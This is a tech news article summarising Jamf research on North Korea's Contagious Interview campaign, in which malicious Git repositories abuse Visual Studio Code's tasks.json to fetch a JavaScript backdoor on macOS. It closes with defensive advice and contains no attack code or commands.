- Lazarus Group’s Contagious Interview campaign abuses Visual Studio Code via malicious Git repositories
- Attackers serve JavaScript payloads to macOS, enabling persistent data collection and C2 communication.
- Jamf recommends enabling advanced threat controls and being careful with untrusted repositories
As part of the infamous Contagious Interview campaign, North Korean actors were seen abusing legitimate Microsoft Visual Studio code in their attacks.
Contagious Interview is a hacking campaign in which the Lazarus Group (and other state-sponsored North Korean actors) creates fake jobs and invites software and blockchain developers in Western countries for interviews.
During the interview process, they trick victims into deploying malware on their devices, granting the attackers unrestricted access to their computers, as well as their current employers’ networks.
How to stay safe
The campaign is also very successful, as it is accused of being behind some of the biggest crypto heists in recent years.
In a new report, Jamf security researchers detailed “an evolution in the techniques used during the early stages of the campaign.” They said attackers would first create a malicious Git repository and host it on platforms such as GitHub or GitLab.
After that, during the “maintenance” process, they would trick the victim into cloning and opening the repository using Microsoft Visual Studio Code. The tool would prompt the victim to trust the author of the repository and if this happens, the application automatically processes the tasks.json configuration file which triggers arbitrary built-in commands.
On macOS, these commands use a background shell to remotely fetch a JavaScript payload (often from a platform like Vercel) and pipe it to the Node.js runtime.
The JavaScript payload then executes, establishing a persistent loop that collects host information (host name, MAC addresses, and operating system details) and communicates with a remote command and control (C2) server. Finally, the backdoor periodically pings the C2 server, sending system data and receiving other malicious JavaScript instructions.
“We strongly recommend that customers ensure that Threat Prevention and Advanced Threat Controls are enabled and configured in blocking mode in Jamf for Mac to remain protected against the techniques described in this research,” Jamf warned.
“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or from unknown sources. Before marking a repository as trusted in Visual Studio Code, it is important to review its contents,” they added.
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
